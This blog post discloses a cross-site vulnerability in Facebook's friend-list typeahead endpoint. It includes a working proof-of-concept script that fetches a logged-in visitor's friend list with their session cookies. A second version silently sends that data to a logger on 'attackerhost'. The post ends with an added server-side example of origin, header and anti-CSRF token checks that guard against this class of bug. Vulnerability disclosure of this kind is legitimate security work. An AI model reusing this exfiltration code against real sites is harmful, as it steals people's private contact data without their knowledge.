Today I was taking a look at the Facebook AJAX JavaScript that is responsible for giving suggestions in the search text box found under the Facebook logo on the left.
I found this URL http://www.facebook.com/ajax/typeahead_search.php? hard-coded in the following JavaScript:
function search_friend_source(get_param)
{
    this.parent.construct(this, get_param);
    new AsyncRequest()
        .setMethod('GET')
        .setReadOnly(true)
        .setURI('/ajax/typeahead_search.php?' + get_param)
        .setErrorHandler(function() {})
        .setHandler(function(response) {
            this.values = response.getPayload().entries;
            this.build_index();
        }.bind(this))
        .send();
}
in the file http://static.ak.facebook.com/js/typeaheadpro.js?44:75333.
Whenever you open that URL in any browser it returns a complete list of all your Facebook friends in a JavaScript format similar to JSON; the request is authenticated with the credentials stored in your browser's cookies.
Once I saw it I knew instantly that I had found a security vulnerability similar to the famous Gmail XSS vulnerability: anybody with proper AJAX knowledge can host a JavaScript on their site that requests this page using your credentials and gets your entire Facebook friends list, so I made this proof-of-concept code to demonstrate the vulnerability:
<script>
// Create the XHR object and request the friend-list endpoint; the browser
// attaches the victim's Facebook cookies to the request automatically.
var xmlHttp = GetXmlHttpObject();
var url = "http://www.facebook.com/ajax/typeahead_search.php?";
xmlHttp.onreadystatechange = stateChanged;
xmlHttp.open("GET", url, true);
xmlHttp.send(null);

function stateChanged()
{
    // readyState 4: the response is complete, show what Facebook returned
    if (xmlHttp.readyState == 4)
    {
        alert(xmlHttp.responseText);
    }
}

function GetXmlHttpObject()
{
    // I didn't add the code to create the XHR object for Firefox because
    // it doesn't work in Firefox anyway; if you have time to test this
    // PoC with other browsers and it works, please let me know.
    var xmlHttp = null;
    try
    {
        xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
    }
    catch (e)
    {
        xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
    }
    return xmlHttp;
}
</script>
If you open any web page on the internet that contains that code while you are logged in to Facebook (i.e. your browser still has your session cookies), it will show you a message box containing the JavaScript returned by Facebook with all your friends and their public data, such as their profile URL and their networks. Instead of being displayed, this data can be sent to an attacker and logged like this:
function stateChanged()
{
    if (xmlHttp.readyState == 4)
    {
        // Forward the response to the logger instead of displaying it;
        // URL-encode it so the whole payload survives as a query parameter.
        var xmlHttpLogger = GetXmlHttpObject();
        xmlHttpLogger.open("GET", "http://attackerhost/logger.php?log=" + encodeURIComponent(xmlHttp.responseText), true);
        xmlHttpLogger.send(null);
    }
}
So if you open a page containing this version it will not alert you; instead it will silently send your Facebook contact list to the attacker.
I've tested this proof of concept only with IE7, where it works fine; I've also tried it with Firefox, where it doesn't work because of the "same domain security policy" in Firefox. If you have some time to test it with other browsers, please inform me of the results. Thanks.
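The fix for this class of bug lives on the server: an endpoint that returns per-user data must not serve a request just because the browser attached the session cookie, since any page can trigger such a request. The following is an added example (not Facebook's code) of the checks such an endpoint should make, in Node.js-style JavaScript; SITE_ORIGIN, the header names and the csrf_token parameter are assumed names for illustration.

```javascript
// Added example (not Facebook's code): server-side guard for an authenticated
// AJAX endpoint such as the friend-list typeahead discussed above. A request
// is served only if it provably came from our own pages, not merely because
// the browser attached the victim's session cookie. SITE_ORIGIN, the header
// names and the csrf_token parameter are assumed names for illustration.
const SITE_ORIGIN = "https://www.example.com";

// True if `url` (an Origin or Referer header value) belongs to our own origin.
function isOwnOrigin(url) {
  try {
    return new URL(url).origin === SITE_ORIGIN;
  } catch (e) {
    return false; // missing or unparsable header: treat as foreign
  }
}

// Compare secrets without short-circuiting on the first differing byte.
function tokensEqual(a, b) {
  if (typeof a !== "string" || typeof b !== "string" || a.length !== b.length) {
    return false;
  }
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// req: { headers: {lowercase-name: value}, query: {name: value} };
// session: server-side session record holding the per-session csrfToken.
// Returns { ok: true } or { ok: false, reason } so callers can log the reason.
function authorizeAjaxRequest(req, session) {
  const h = (req && req.headers) || {};
  const q = (req && req.query) || {};
  // 1. The page that issued the request must be ours: a third-party page's
  //    request carries its own Origin/Referer, which its script cannot forge.
  if (!isOwnOrigin(h["origin"] || h["referer"])) return { ok: false, reason: "bad-origin" };
  // 2. A custom header our own AJAX code sets on every call; a plain
  //    cross-site request (script tag, form, image) cannot add one.
  if (h["x-requested-with"] !== "XMLHttpRequest") return { ok: false, reason: "missing-xhr-header" };
  // 3. A per-session anti-CSRF token embedded in our pages; an attacker's page
  //    cannot read it, so it cannot include it in a forged request.
  if (!tokensEqual(q.csrf_token, session && session.csrfToken)) return { ok: false, reason: "bad-token" };
  return { ok: true };
}

// Prefix JSON-like responses so that a page loading the endpoint via
// <script src=...> gets an infinite loop instead of the data; our own
// same-origin XHR callers strip the prefix before parsing.
function protectJsonBody(obj) {
  return "for (;;);" + JSON.stringify(obj);
}
```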